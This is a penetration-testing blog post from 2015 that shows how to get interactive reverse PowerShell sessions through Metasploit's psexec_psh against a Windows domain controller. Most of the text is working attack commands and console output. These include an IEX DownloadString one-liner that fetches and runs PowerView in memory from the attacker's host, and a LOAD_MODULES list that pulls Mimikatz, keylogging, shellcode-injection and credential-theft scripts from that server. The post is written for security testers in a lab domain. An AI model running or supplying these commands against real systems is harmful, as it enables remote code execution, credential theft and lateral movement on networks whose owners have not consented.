June 26, 2015

Interactive PowerShell Sessions Within Meterpreter

Written by Larry Spohn

In case anyone missed it, Metasploit has a couple of new payloads that allow interactive PowerShell sessions. What does that mean? Previously, if you tried to open a PowerShell session within Meterpreter, there was no interaction between PowerShell and your session. Example:

msf exploit(psexec_psh) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:444/
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.81.10:49309 (UUID: 820e464723e817f9/x86=1/windows=1/2015-06-08T16:12:05Z) Staging Native payload ...
[*] Meterpreter session 23 opened (192.168.81.217:444 -> 192.168.81.10:49309) at 2015-06-08 12:12:05 -0400

meterpreter > shell
Process 2776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>powershell
powershell
Windows PowerShell 
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

Get-ExecutionPolicy

Any command that you type seems to disappear in the ether. Now, thanks to the hard work of Ben Turner (@benpturner) and Dave Hardy (@davehardy20) at Nettitude, we have full interaction with PowerShell sessions! Their introduction to these modules is here. To find the new payloads within Metasploit, simply search for "Interactive_Powershell"

msf payload(reverse_powershell) > search Interactive_Powershell

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   payload/cmd/windows/powershell_bind_tcp                      normal  Windows Interactive Powershell Session, Bind TCP
   payload/cmd/windows/powershell_reverse_tcp                   normal  Windows Interactive Powershell Session, Reverse TCP
   payload/windows/powershell_bind_tcp                          normal  Windows Interactive Powershell Session, Bind TCP
   payload/windows/powershell_reverse_tcp                       normal  Windows Interactive Powershell Session, Reverse TCP

Let's try a "Reverse TCP" payload:

msf exploit(psexec_psh) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(psexec_psh) > exploit 

[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 24 opened (192.168.81.217:444 -> 192.168.81.10:49317) at 2015-06-08 12:15:42 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>Get-ExecutionPolicy
Bypass

This allows us to use all of our favorite PowerShell tools, such as PowerSploit and PowerTools (included in Veil-Framework), from within a Meterpreter session. To avoid downloading the tools to disk, we use "Invoke-Expression" to run the tools directly in memory. I like to host them locally, as opposed to downloading the from the Internet.

PS C:\Windows\system32>IEX(New-Object Net.WebClient).DownloadString("http://192.168.81.217/PowerTools/PowerView/powerview.ps1")
PS C:\Windows\system32> Get-NetGroup "Domain Admins" |select UserName

UserName                                                                       
--------                                                                       
TrustedSec                                                                     
Administrator

Instead of loading modules from within an existing session, the payloads also allow you to configure modules before the session is created, by setting the "LOAD_MODULES" parameter.

Payload options (windows/powershell_reverse_tcp):

   Name          Current Setting                                           Required  Description
   ----          ---------------                                           --------  -----------
   EXITFUNC      thread                                                    yes       Exit technique (accepted: seh, thread, process, none)
   LHOST         192.168.81.217                                            yes       The listen address
   LOAD_MODULES  http://192.168.81.217/PowerTools/PowerView/powerview.ps1  no        A list of powershell modules seperated by a comma to download over the web
   LPORT         444                                                       yes       The listen port

msf exploit(psexec_psh) > exploit 

[*] Loading 1 modules into the interactive PowerShell session
[*] Started reverse handler on 192.168.81.217:444 
[*] 192.168.81.10:445 - Executing the payload...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 26 opened (192.168.81.217:444 -> 192.168.81.10:49391) at 2015-06-08 12:29:58 -0400

Windows PowerShell running as user PWNT-DC$ on PWNT-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> Get-NetForest


Name                  : pwnt.com
Sites                 : {Default-First-Site-Name}
Domains               : {pwnt.com}
GlobalCatalogs        : {pwnt-dc.pwnt.com}
ApplicationPartitions : {DC=DomainDnsZones,DC=pwnt,DC=com, DC=ForestDnsZones,DC
                        =pwnt,DC=com}
ForestMode            : Windows2008R2Forest
RootDomain            : pwnt.com
Schema                : CN=Schema,CN=Configuration,DC=pwnt,DC=com
SchemaRoleOwner       : pwnt-dc.pwnt.com
NamingRoleOwner       : pwnt-dc.pwnt.com

You can also load multiple modules all at once by providing a list separated by commas. I cloned the PowerSploit and PowerTools modules to my Apache root, so to enumerate all modules, I simply use "find" to display all PowerShell scripts recursively.

root@kali:~# find /var/www -name "*.ps1"
/var/www/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
/var/www/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
/var/www/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
/var/www/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
/var/www/PowerSploit/Recon/Invoke-Portscan.ps1
/var/www/PowerSploit/Recon/Get-ComputerDetails.ps1
/var/www/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
/var/www/PowerSploit/Recon/Get-HttpStatus.ps1
/var/www/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
/var/www/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
/var/www/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
/var/www/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
/var/www/PowerSploit/Exfiltration/Out-Minidump.ps1
/var/www/PowerSploit/Exfiltration/Get-GPPPassword.ps1
/var/www/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
/var/www/PowerSploit/Exfiltration/Get-VaultCredential.ps1
/var/www/PowerSploit/Exfiltration/Get-Keystrokes.ps1
/var/www/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
/var/www/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
/var/www/PowerSploit/ScriptModification/Remove-Comments.ps1
/var/www/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
/var/www/PowerSploit/ScriptModification/Out-CompressedDll.ps1
/var/www/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
/var/www/PowerTools/PowerBreach/PowerBreach.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassSearch.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassCommand.ps1
/var/www/PowerTools/PewPewPew/Invoke-MassTokens.ps1
/var/www/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
/var/www/PowerTools/PowerPick/PSInjector/PSInject.ps1
/var/www/PowerTools/PowerUp/PowerUp.ps1
/var/www/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
/var/www/PowerTools/PowerView/functions/Get-NetShare.ps1
/var/www/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
/var/www/PowerTools/PowerView/functions/Invoke-Netview.ps1
/var/www/PowerTools/PowerView/functions/Get-Net.ps1
/var/www/PowerTools/PowerView/functions/Get-NetSessions.ps1
/var/www/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
/var/www/PowerTools/PowerView/powerview.ps1

To replace "/var/www" with your web host, use "sed":

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1
http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1
http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1
http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1
http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1
http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1
http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1
http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1
http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1
http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1
http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1
http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1
http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1
http://192.168.81.217/PowerTools/PowerView/powerview.ps1

To create a comma separated list, use "tr":

root@kali:~# find /var/www -name "*.ps1" |sed 's_/var/www_http://192.168.81.217_'|sed 's_/var/www_https://192.168.81.217_' |tr '\n' ','
http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ShellcodeMSIL.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-DllInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke--Shellcode.ps1,http://192.168.81.217/PowerSploit/CodeExecution/Invoke-Shellcode.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-Portscan.ps1,http://192.168.81.217/PowerSploit/Recon/Get-ComputerDetails.ps1,http://192.168.81.217/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1,http://192.168.81.217/PowerSploit/Recon/Get-HttpStatus.ps1,http://192.168.81.217/PowerSploit/AntivirusBypass/Find-AVSignature.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-CredentialInjection.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Out-Minidump.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-GPPPassword.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-VaultCredential.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-Keystrokes.ps1,http://192.168.81.217/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1,http://192.168.81.217/PowerSploit/Exfiltration/VolumeShadowCopyTools.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Remove-Comments.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncodedCommand.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-CompressedDll.ps1,http://192.168.81.217/PowerSploit/ScriptModification/Out-EncryptedScript.ps1,http://192.168.81.217/PowerTools/PowerBreach/PowerBreach.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassMimikatz.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTemplate.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassSearch.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassCommand.ps1,http://192.168.81.217/PowerTools/PewPewPew/Invoke-MassTokens.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/DLLEnc.ps1,http://192.168.81.217/PowerTools/PowerPick/PSInjector/PSInject.ps1,http://192.168.81.217/PowerTools/PowerUp/PowerUp.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-UserHunter.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetShare.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-ShareFinder.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Invoke-Netview.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-Net.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetSessions.ps1,http://192.168.81.217/PowerTools/PowerView/functions/Get-NetLoggedon.ps1,http://192.168.81.217/PowerTools/PowerView/powerview.ps1,

Copy/paste that output into your "LOAD_MODULES" parameter and all the PowerShell goodness is at your fingertips. Go forth and plunder!!! This article was written by Larry Spohn @Spoonman1091 | Senior Principal Security Consultant.

Solutions

Services

About Us

Interactive PowerShell Sessions Within Meterpreter